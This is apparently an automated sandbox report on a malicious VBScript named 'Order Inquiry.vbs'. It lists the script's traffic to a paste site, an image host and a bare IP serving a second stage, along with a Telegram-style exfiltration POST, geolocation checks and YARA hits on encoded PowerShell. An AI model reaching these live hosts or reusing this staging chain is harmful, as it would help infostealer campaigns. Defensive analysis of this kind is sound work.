Windows Analysis Report
Order Inquiry.vbs

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: paste.ee

Source: global traffic	HTTP traffic detected: GET /images/004/798/013/original/new_image.jpg?1718284138 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/798/013/original/new_image.jpg?1718284138 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic	HTTP traffic detected: GET /API/FETCH/filter.php?countryid=14&token=vKEV5IjRm7wh HTTP/1.1Host: whatismyipaddressnow.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /API/FETCH/filter.php?countryid=14&token=vKEV5IjRm7wh HTTP/1.1Host: whatismyipaddressnow.co
Source: global traffic	HTTP traffic detected: POST /API/FETCH/getcountry.php HTTP/1.1Content-Type: multipart/form-data; boundary=---TelegramBotAPI_638539932481665828Host: whatismyipaddressnow.coContent-Length: 3035Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /sword.txt HTTP/1.1Host: 93.123.39.71Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Source: Joe Sandbox View	ASN Name: TUT-ASUS TUT-ASUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: whatismyipaddressnow.co
Source: unknown	DNS query: name: whatismyipaddressnow.co
Source: unknown	DNS query: name: icanhazip.com
Source: unknown	DNS query: name: icanhazip.com
Source: unknown	DNS query: name: ip-api.com

Source: global traffic

HTTP traffic detected: GET /d/3dasY HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49710 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.71
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /d/3dasY HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/798/013/original/new_image.jpg?1718284138 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/798/013/original/new_image.jpg?1718284138 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic	HTTP traffic detected: GET /API/FETCH/filter.php?countryid=14&token=vKEV5IjRm7wh HTTP/1.1Host: whatismyipaddressnow.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /API/FETCH/filter.php?countryid=14&token=vKEV5IjRm7wh HTTP/1.1Host: whatismyipaddressnow.co
Source: global traffic	HTTP traffic detected: GET /sword.txt HTTP/1.1Host: 93.123.39.71Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: paste.ee
Source: global traffic	DNS traffic detected: DNS query: uploaddeimagens.com.br
Source: global traffic	DNS traffic detected: DNS query: whatismyipaddressnow.co
Source: global traffic	DNS traffic detected: DNS query: icanhazip.com
Source: global traffic	DNS traffic detected: DNS query: 75.103.13.0.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: ip-api.com

Source: unknown

HTTP traffic detected: POST /API/FETCH/getcountry.php HTTP/1.1Content-Type: multipart/form-data; boundary=---TelegramBotAPI_638539932481665828Host: whatismyipaddressnow.coContent-Length: 3035Connection: Keep-Alive

Source: cert9.db.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: cert9.db.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: cert9.db.9.dr	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: cert9.db.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: cert9.db.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: cert9.db.9.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: cert9.db.9.dr	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000302E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com
Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000302E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com/
Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000307E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000307E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: cert9.db.9.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: cert9.db.9.dr	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 00000005.00000002.1706558041.0000021CD9113000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1937420985.000001E4CFD41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1706558041.0000021CD8EF1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: AddInProcess32.exe, 00000009.00000002.1681596776.00000000030DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://whatismyipaddressnow.co
Source: powershell.exe, 00000005.00000002.1706558041.0000021CD9113000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: cert9.db.9.dr	String found in binary or memory: http://x1.c.lencr.org/0
Source: cert9.db.9.dr	String found in binary or memory: http://x1.i.lencr.org/0
Source: AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000003.00000002.1937420985.000001E4CFCF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000003.00000002.1937420985.000001E4CFD12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1706558041.0000021CD8EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee
Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee;
Source: AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com
Source: wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com;
Source: AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: AddInProcess32.exe, 00000009.00000002.1681596776.00000000031EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hT
Source: AddInProcess32.exe, 00000009.00000002.1681596776.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.00000000030C2000.00000004.00000800.00020000.00000000.sdmp, tmp7752.tmp.dat.9.dr	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: tmp7752.tmp.dat.9.dr	String found in binary or memory: https://chrome.google.com/webstore?hl=enWeb
Source: AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com
Source: wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 00000005.00000002.1706558041.0000021CD9113000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1977414907.000001E4E7D10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.microsoft.co
Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.comZ
Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/H
Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/_
Source: wscript.exe, 00000000.00000003.1408406314.00000260C4BEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1409759305.00000260C4BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411362998.00000260C4A80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408211017.00000260C4A8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/3dasY
Source: wscript.exe, 00000000.00000003.1408406314.00000260C4BEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1409759305.00000260C4BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4BF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/3dasY$
Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/3dasY0
Source: wscript.exe, 00000000.00000003.1409306033.00000260C2CFD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411281235.00000260C2D37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410321938.00000260C2D37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/3dasY4
Source: wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/3dasYz
Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.gravatar.com
Source: tmpB97.tmp.dat.9.dr	String found in binary or memory: https://support.mozilla.org
Source: tmpB97.tmp.dat.9.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: tmpB97.tmp.dat.9.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
Source: wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://themes.googleusercontent.com
Source: powershell.exe, 00000005.00000002.1706558041.0000021CD9113000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br
Source: powershell.exe, 00000005.00000002.1706558041.0000021CD8EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138
Source: AddInProcess32.exe, 00000009.00000002.1681596776.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.00000000030DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://whatismyipaddressnow.co
Source: AddInProcess32.exe, 00000009.00000002.1681596776.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://whatismyipaddressnow.co/API/FETCH/filter.php?countryid=14&token=vKEV5IjRm7wh
Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000302E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://whatismyipaddressnow.co/API/FETCH/getcountry.php
Source: AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com;
Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: tmpB97.tmp.dat.9.dr	String found in binary or memory: https://www.mozilla.org
Source: tmpB97.tmp.dat.9.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: tmpB97.tmp.dat.9.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: tmpB97.tmp.dat.9.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: tmpB97.tmp.dat.9.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: AddInProcess32.exe, 00000009.00000002.1681596776.00000000034CE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.0000000003054000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.00000000030C2000.00000004.00000800.00020000.00000000.sdmp, tmpE8C2.tmp.dat.9.dr	String found in binary or memory: https://www.office.com/
Source: AddInProcess32.exe, 00000009.00000002.1681596776.00000000034CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/LR
Source: tmpE8C2.tmp.dat.9.dr	String found in binary or memory: https://www.office.com/Office
Source: AddInProcess32.exe, 00000009.00000002.1735664078.000000000616C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.oracle.com/technetwork/java/javase/downloads

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54306
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 54306 -> 443

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:54306 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Window created: window name: CLIPBRDWNDCLASS

Malicious sample detected (through community Yara rule)

System Summary

Source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7908, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 8786
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 8786			Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}

Wscript starts Powershell (via cmd or directly)

